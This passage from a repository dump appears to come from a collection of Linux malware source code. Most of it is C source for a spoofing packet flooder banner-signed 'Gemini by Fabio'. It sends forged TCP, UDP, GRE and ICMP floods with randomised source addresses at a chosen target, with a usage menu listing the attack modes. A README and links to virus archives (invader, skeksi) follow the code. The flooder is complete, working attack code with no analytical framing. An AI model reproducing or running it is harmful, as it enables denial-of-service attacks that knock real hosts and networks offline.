ICMP_ECHO_G) 65 | #define CHOOSE_DST_PORT() dst_sp == 0 ?\ 66 | random () :\ 67 | htons(dst_sp + (random() % (dst_ep -dst_sp +1))); 68 | #define CHOOSE_SRC_PORT() src_sp == 0 ?\ 69 | random () :\ 70 | htons(src_sp + (random() % (src_ep -src_sp +1))); 71 | #define SEND_PACKET() if (sendto(rawsock,\ 72 | &packet,\ 73 | (sizeof packet),\ 74 | 0,\ 75 | (struct sockaddr *)&target,\ 76 | sizeof target) < 0) {\ 77 | perror("sendto");\ 78 | exit(-1);\ 79 | } 80 | /* linux cksum */ 81 | #define BANNER_CKSUM 54018 82 | /* sunos cksum */ 83 | //#define BANNER_CKSUM 723 84 | int psize = 0; 85 | u_long lookup(const char *host); 86 | unsigned short in_cksum(unsigned short *addr, int len); 87 | static void inject_iphdr(struct ip *ip, u_char p, u_char len); 88 | char *class2ip(const char *class); 89 | static void send_tcp(u_char th_flags); 90 | static void send_udp(u_char garbage); 91 | static void send_icmp(u_char garbage); 92 | static void send_gre(u_char garbage); 93 | char *get_plain(const char *crypt_file, const char *xor_data_key); 94 | static void usage(const char *argv0); 95 | u_long dstaddr; 96 | u_short dst_sp, dst_ep, src_sp, src_ep; 97 | char *src_class, *dst_class; 98 | int a_flags, rawsock; 99 | struct sockaddr_in target; 100 | struct pseudo_hdr { 101 | u_long saddr, daddr; 102 | u_char mbz, ptcl; 103 | u_short tcpl; 104 | }; 105 | struct cksum { 106 | struct pseudo_hdr pseudo; 107 | struct tcphdr tcp; 108 | }; 109 | struct { 110 | int gv; 111 | int kv; 112 | void (*f)(u_char); 113 | } a_list[] = { 114 | { TCP_ACK, TH_ACK, send_tcp }, 115 | { TCP_FIN, TH_FIN, send_tcp }, 116 | { TCP_SYN, TH_SYN, send_tcp }, 117 | { TCP_RST, TH_RST, send_tcp }, 118 | { TCP_NOF, TH_NOF, send_tcp }, 119 | { TCP_URG, TH_URG, send_tcp }, 120 | { TCP_PSH, TH_PUSH, send_tcp }, 121 | { TCP_ECE, TH_ECE, send_tcp }, 122 | { TCP_CWR, TH_CWR, send_tcp }, 123 | { UDP_CFF, 0, send_udp }, 124 | { GRE_CFF, 0, send_gre }, 125 | { ICMP_ECHO_G, ICMP_ECHO, send_icmp }, 126 | { 0, 0, (void *)NULL }, 127 | }; 128 | int 129 | main(int argc, char *argv[]) 130 | { 131 | int n, i, on = 1; 132 | int b_link; 133 | #ifdef F_PASS 134 | struct stat sb; 135 | #endif 136 | unsigned int until; 137 | a_flags = dstaddr = i = 0; 138 | dst_sp = dst_ep = src_sp = src_ep = 0; 139 | until = b_link = -1; 140 | src_class = dst_class = NULL; 141 | while ( (n = getopt(argc, argv, "T:RGUINs:h:d:p:q:l:x:t:")) != -1) { 142 | char *p; 143 | switch (n) { 144 | case 'T': 145 | switch (atoi(optarg)) { 146 | case 0: a_flags |= TCP_ACK; break; 147 | case 1: a_flags |= TCP_PSH; break; 148 | case 2: a_flags |= TCP_RST; break; 149 | case 3: a_flags |= TCP_SYN; break; 150 | case 4: a_flags |= TCP_URG; break; 151 | case 5: a_flags |= TCP_FIN; break; 152 | case 6: a_flags |= TCP_ECE; break; 153 | case 7: a_flags |= TCP_CWR; break; 154 | } 155 | break; 156 | case 'U': 157 | a_flags |= UDP_CFF; 158 | break; 159 | case 'R': 160 | a_flags |= rand(); 161 | break; 162 | case 'G': 163 | a_flags |= GRE_CFF; 164 | break; 165 | case 'I': 166 | a_flags |= ICMP_ECHO_G; 167 | break; 168 | case 'N': 169 | a_flags |= TCP_NOF; 170 | break; 171 | case 's': 172 | src_class = optarg; 173 | break; 174 | case 'h': 175 | dstaddr = lookup(optarg); 176 | break; 177 | case 'd': 178 | dst_class = optarg; 179 | i = 1; 180 | break; 181 | case 'x': 182 | psize = atoi(optarg); 183 | break; 184 | case 'p': 185 | if ( (p = (char *) strchr(optarg, ',')) == NULL) 186 | usage(argv[0]); 187 | dst_sp = atoi(optarg); 188 | dst_ep = atoi(p +1); 189 | break; 190 | case 'q': 191 | if ( (p = (char *) strchr(optarg, ',')) == NULL) 192 | usage(argv[0]); 193 | src_sp = atoi(optarg); 194 | src_ep = atoi(p +1); 195 | break; 196 | case 'l': 197 | b_link = atoi(optarg); 198 | if (b_link <= 0 || b_link > 100) 199 | usage(argv[0]); 200 | break; 201 | case 't': 202 | until = time(0) +atoi(optarg); 203 | break; 204 | default: 205 | usage(argv[0]); 206 | break; 207 | } 208 | } 209 | if ( (!dstaddr && !i) || 210 | (dstaddr && i) || 211 | (!TCP_ATTACK() && !GRE_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) || 212 | (src_sp != 0 && src_sp > src_ep) || 213 | (dst_sp != 0 && dst_sp > dst_ep)) 214 | usage(argv[0]); 215 | srandom(time(NULL) ^ getpid()); 216 | if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { 217 | perror("socket"); 218 | exit(-1); 219 | } 220 | if (!psize) 221 | psize = PSIZE; 222 | if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL, 223 | (char *)&on, sizeof(on)) < 0) { 224 | perror("setsockopt"); 225 | exit(-1); 226 | } 227 | target.sin_family = AF_INET; 228 | for (n = 0; ; ) { 229 | if (b_link != -1 && random() % 100 +1 > b_link) { 230 | if (random() % 200 +1 > 199) 231 | usleep(1); 232 | continue; 233 | } 234 | for (i = 0; a_list[i].f != NULL; ++i) { 235 | if (a_list[i].gv & a_flags) 236 | a_list[i].f(a_list[i].kv); 237 | } 238 | if (n++ == 100) { 239 | if (until != -1 && time(0) >= until) break; 240 | n = 0; 241 | } 242 | } 243 | exit(0); 244 | } 245 | u_long 246 | lookup(const char *host) 247 | { 248 | struct hostent *hp; 249 | if ( (hp = gethostbyname(host)) == NULL) { 250 | perror("gethostbyname"); 251 | exit(-1); 252 | } 253 | return *(u_long *)hp->h_addr; 254 | } 255 | #define RANDOM() (int) random() % 255 +1 256 | char * 257 | class2ip(const char *class) 258 | { 259 | static char ip[16]; 260 | int i, j; 261 | for (i = 0, j = 0; class[i] != '\0'; ++i) 262 | if (class[i] == '.') 263 | ++j; 264 | switch (j) { 265 | case 0: 266 | sprintf(ip, "%s.%d.%d.%d", class, (int) random() % 245+1, (int) random() % 225+1, (int) random() % 215+1); 267 | break; 268 | case 1: 269 | sprintf(ip, "%s.%d.%d", class, (int) random() % 245+1, (int) random() % 215+1); 270 | break; 271 | case 2: 272 | sprintf(ip, "%s.%d", class, (int) random() % 245+1); 273 | break; 274 | default: strncpy(ip, class, 16); 275 | break; 276 | } 277 | return ip; 278 | } 279 | unsigned short 280 | in_cksum(unsigned short *addr, int len) 281 | { 282 | int nleft = len; 283 | int sum = 0; 284 | unsigned short *w = addr; 285 | unsigned short answer = 0; 286 | while (nleft > 1) { 287 | sum += *w++; 288 | nleft -= 2; 289 | } 290 | if (nleft == 1) { 291 | *(unsigned char *) (&answer) = *(unsigned char *)w; 292 | sum += answer; 293 | } 294 | sum = (sum >> 16) + (sum & 0xffff); 295 | sum += (sum >> 16); 296 | answer = ~sum; 297 | return answer; 298 | } 299 | static void 300 | inject_iphdr(struct ip *ip, u_char p, u_char len) 301 | { 302 | ip->ip_hl = 5; 303 | ip->ip_v = 4; 304 | ip->ip_p = p; 305 | ip->ip_tos = 0x08; 306 | ip->ip_id = random(); 307 | ip->ip_len = len; 308 | ip->ip_off = 0; 309 | ip->ip_ttl = 255; 310 | ip->ip_dst.s_addr = dst_class != NULL ? 311 | inet_addr(class2ip(dst_class)) : 312 | dstaddr; 313 | ip->ip_src.s_addr = src_class != NULL ? 314 | inet_addr(class2ip(src_class)) : 315 | random(); 316 | target.sin_addr.s_addr = ip->ip_dst.s_addr; 317 | } 318 | static void 319 | send_tcp(u_char th_flags) 320 | { 321 | struct cksum cksum; 322 | struct packet { 323 | struct ip ip; 324 | struct tcphdr tcp; 325 | } packet; 326 | memset(&packet, 0, sizeof packet); 327 | inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet)); 328 | packet.ip.ip_sum = in_cksum((void *)&packet.ip,0); 329 | cksum.pseudo.daddr = dstaddr; 330 | cksum.pseudo.mbz = 0; 331 | cksum.pseudo.ptcl = IPPROTO_TCP; 332 | cksum.pseudo.tcpl = htons(sizeof(struct tcphdr)); 333 | cksum.pseudo.saddr = packet.ip.ip_src.s_addr; 334 | packet.tcp.th_win = random(); 335 | packet.tcp.th_seq = random(); 336 | packet.tcp.th_ack = random(); 337 | packet.tcp.th_flags = th_flags; 338 | packet.tcp.th_off = 5; 339 | packet.tcp.th_urp = 1; 340 | packet.tcp.th_sport = CHOOSE_SRC_PORT(); 341 | packet.tcp.th_dport = CHOOSE_DST_PORT(); 342 | cksum.tcp = packet.tcp; 343 | packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); 344 | SEND_PACKET(); 345 | } 346 | static void 347 | send_udp(u_char garbage) 348 | { 349 | struct packet { 350 | struct ip ip; 351 | struct udphdr udp; 352 | } packet; 353 | memset(&packet, 0, sizeof packet); 354 | inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet)); 355 | packet.ip.ip_sum = in_cksum((void *)&packet.ip,0); 356 | packet.udp.uh_sport = CHOOSE_SRC_PORT(); 357 | packet.udp.uh_dport = CHOOSE_DST_PORT(); 358 | packet.udp.uh_ulen = htons(sizeof(struct udphdr) + psize); 359 | packet.udp.uh_sum = 0; 360 | SEND_PACKET(); 361 | } 362 | static void 363 | send_gre(u_char garbage) 364 | { 365 | struct packet { 366 | struct ip ip; 367 | struct udphdr udp; 368 | } packet; 369 | memset(&packet, 0, sizeof packet); 370 | inject_iphdr(&packet.ip, IPPROTO_GRE, FIX(sizeof packet)); 371 | packet.ip.ip_sum = in_cksum((void *)&packet.ip,0); 372 | packet.udp.uh_sport = CHOOSE_SRC_PORT(); 373 | packet.udp.uh_dport = CHOOSE_DST_PORT(); 374 | packet.udp.uh_ulen = htons(sizeof(struct udphdr) + psize); 375 | packet.udp.uh_sum = 0; 376 | SEND_PACKET(); 377 | } 378 | static void 379 | send_icmp(u_char gargabe) 380 | { 381 | struct packet { 382 | struct ip ip; 383 | struct icmp icmp; 384 | } packet; 385 | memset(&packet, 0, sizeof packet); 386 | inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet)); 387 | packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); 388 | packet.icmp.icmp_type = ICMP_ECHO; 389 | packet.icmp.icmp_code = 0; 390 | packet.icmp.icmp_cksum = htons( ~(ICMP_ECHO << 8)); 391 | SEND_PACKET(); 392 | } 393 | const char *banner = "\e[1;37m(\e[0m\e[0;31mGemini\e[0m\e[1;37m)\e[0m-\e[1;37mby\e[0m-\e[1;37m(\e[0m\e[0;31mFabio\e[0m\e[1;37m)\e[0m"; 394 | static void 395 | usage(const char *argv0) 396 | { 397 | printf("%s \n", banner); 398 | printf(" -U UDP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n"); 399 | printf(" -I ICMP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n"); 400 | printf(" -N Bogus attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n"); 401 | printf(" -R Randomised attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n"); 402 | printf(" -G GRE attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n"); 403 | printf(" -T TCP attack \e[1;37m[\e[0m0:ACK 1:PSH\e[1;37m]\e[0m\n"); 404 | printf(" \e[1;37m[\e[0m2:RST 3:SYN\e[1;37m]\e[0m\n"); 405 | printf(" \e[1;37m[\e[0m4:URG 5:FIN\e[1;37m]\e[0m\n"); 406 | printf(" \e[1;37m[\e[0m6:ECE 7:CWR\e[1;37m]\e[0m\n"); 407 | printf(" -h target host/ip \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n"); 408 | printf(" -d destination class \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n"); 409 | printf(" -s source class/ip \e[1;37m(\e[m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n"); 410 | printf(" -p destination port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n"); 411 | printf(" -q source port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n"); 412 | printf(" -l pps limiter \e[1;37m(\e[0m\e[0;31mno limit\e[0m\e[1;37m)\e[0m\n"); 413 | printf(" -t timeout \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n"); 414 | printf(" -x udp length \e[1;37m(\e[0m\e[0;31m1-65535\e[0m\e[1;37m)\e[0m\n"); 415 | printf("\e[1musage\e[0m: %s -T0 -U -h 12.12.12.12 -x5\n", argv0); 416 | exit(-1); 417 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # LinuxMalwareSourceCode 2 | This is a repository of the source code of various malware targeting the *nix (mostly Linux) operating systems. 3 | -------------------------------------------------------------------------------- /Virus/4553-invader-2.1.1.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DarthRa/LinuxMalwareSourceCode/af8c90dd1174296546d47e74a92a714893fdd426/Virus/4553-invader-2.1.1.tar.gz -------------------------------------------------------------------------------- /Virus/skeksi_virus-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DarthRa/LinuxMalwareSourceCode/af8c90dd1174296546d47e74a92a714893fdd426/Virus/skeksi_virus-master.zip --------------------------------------------------------------------------------